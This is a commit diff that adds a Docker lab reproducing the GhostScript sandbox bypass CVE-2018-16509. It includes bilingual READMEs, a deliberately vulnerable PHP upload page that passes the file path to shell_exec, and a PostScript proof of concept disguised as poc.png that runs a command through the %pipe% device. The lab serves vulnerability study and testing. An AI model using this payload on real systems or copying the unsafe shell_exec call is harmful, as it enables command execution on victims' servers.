first commit

ghostscript/CVE-2018-16509/README.md

@@ -0,0 +1,38 @@
+# GhostScript Sandbox Bypass Command Execution (CVE-2018-16509)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+GhostScript is a suite of software based on an interpreter for Adobe Systems' PostScript and PDF page description languages. It is widely used by many image processing libraries such as ImageMagick and Python PIL.
+
+On August 21st, 2018, security researcher Tavis Ormandy disclosed that GhostScript's security sandbox could be bypassed through maliciously crafted image content, leading to command execution, file reading, and file deletion vulnerabilities.
+
+References:
+
+- <http://seclists.org/oss-sec/2018/q3/142>
+- <https://bugs.chromium.org/p/project-zero/issues/detail?id=1640>
+
+## Environment Setup
+
+Execute the following command to start a vulnerable environment (including GhostScript 9.23 and ImageMagick 7.0.8):
+
+```
+docker compose up -d
+```
+
+After the server is started, visit `http://your-ip:8080` to see an upload component.
+
+## Vulnerability Reproduction
+
+Upload [poc.png](poc.png) to execute the command `id > /tmp/success && cat /tmp/success`. Enter the container using `docker compose exec web bash`, and you will see that /tmp/success has been created.
+
+![](1.png)
+
+You can also test this vulnerability using the command line:
+
+```
+docker run -it --rm --name im -v `pwd`/poc.png:/poc.png vulhub/imagemagick:7.0.8-10 convert /poc.png /poc.gif
+```
+
+The command execution result shows that the `id` command has been successfully executed.
+
+![](2.png)

ghostscript/CVE-2018-16509/README.zh-cn.md

@@ -0,0 +1,36 @@
+# GhostScript 沙箱绕过命令执行漏洞（CVE-2018-16509）
+
+GhostScript 是一套基于 Adobe Systems 的 PostScript 和 PDF 页面描述语言解释器的软件。它被许多图像处理库广泛使用，如 ImageMagick、Python PIL 等。
+
+2018年8月21日，安全研究员 Tavis Ormandy 通过公开邮件列表披露了 GhostScript 的安全沙箱可以被绕过的漏洞。通过构造恶意的图片内容，攻击者可以实现命令执行、文件读取和文件删除等操作。
+
+参考链接：
+
+- <http://seclists.org/oss-sec/2018/q3/142>
+- <https://bugs.chromium.org/p/project-zero/issues/detail?id=1640>
+
+## 环境搭建
+
+执行如下命令启动漏洞环境（其中包括 GhostScript 9.23 和 ImageMagick 7.0.8）：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问 `http://your-ip:8080` 将看到一个文件上传组件。
+
+## 漏洞复现
+
+上传 [poc.png](poc.png) 文件，该文件将执行命令 `id > /tmp/success && cat /tmp/success`。使用 `docker compose exec web bash` 进入容器后，可以看到 /tmp/success 文件已被创建。
+
+![](1.png)
+
+你也可以使用命令行来测试该漏洞：
+
+```
+docker run -it --rm --name im -v `pwd`/poc.png:/poc.png vulhub/imagemagick:7.0.8-10 convert /poc.png /poc.gif
+```
+
+从执行结果可以看到，`id` 命令已被成功执行。
+
+![](2.png)

ghostscript/CVE-2018-16509/docker-compose.yml

@@ -0,0 +1,8 @@
+services:
+ web:
+   image: vulhub/imagemagick:7.0.8-10-php
+   command: php -t /var/www/html -S 0.0.0.0:8080
+   volumes:
+    - ./index.php:/var/www/html/index.php
+   ports:
+    - "8080:8080"

ghostscript/CVE-2018-16509/index.php

@@ -0,0 +1,21 @@
+<?php
+
+if (!empty($_FILES)):
+
+$ext = pathinfo($_FILES['file_upload']['name'], PATHINFO_EXTENSION);
+if (!in_array($ext, ['gif', 'png', 'jpg', 'jpeg'])) {
+    die('Unsupported filetype uploaded.');
+}
+
+$size = shell_exec("identify -format '%w x %h' {$_FILES['file_upload']['tmp_name']}");
+
+echo "Image size is: $size";
+
+else:
+?>
+<form method="post" enctype="multipart/form-data">
+    File: <input type="file" name="file_upload">
+    <input type="submit">
+</form>
+<?php
+endif;

ghostscript/CVE-2018-16509/poc.png

@@ -0,0 +1,8 @@
+%!PS
+userdict /setpagedevice undef
+save
+legal
+{ null restore } stopped { pop } if
+{ legal } stopped { pop } if
+restore
+mark /OutputFile (%pipe%id > /tmp/success && cat /tmp/success) currentdevice putdeviceprops